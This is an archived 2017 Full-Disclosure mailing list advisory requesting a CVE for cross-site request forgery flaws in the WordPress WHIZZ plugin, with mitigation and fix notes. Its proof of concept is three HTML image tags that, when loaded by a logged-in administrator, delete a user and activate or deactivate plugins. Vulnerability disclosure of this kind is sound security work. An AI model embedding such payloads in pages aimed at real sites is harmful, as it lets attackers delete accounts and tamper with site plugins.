| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 7 Apr 2017 06:27:16 +0000 From: Wester 95 <evilzyzeng@...look.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] CVE Request:Multiple CSRF in WordPress WHIZZ allow attackers to delete any wordpress users and change plugins status Hi team, I would like to request one CVE id, thank you! Details ====== Software: WordPress WHIZZ Version: <1.1.1 Homepage: https://wordpress.org/plugins/whizz/ ======= Description ================ Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status POC: ======== include in the page ,then attack will occur: delete user: <img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users"> active or disactive plugins: <img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of="> <img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of="> Mitigations ================ Disable the plugin until a new version is released that fixes this bug. FIX: ========== https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically Best regards, Zhiyang Zeng of Tencent security platform department _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists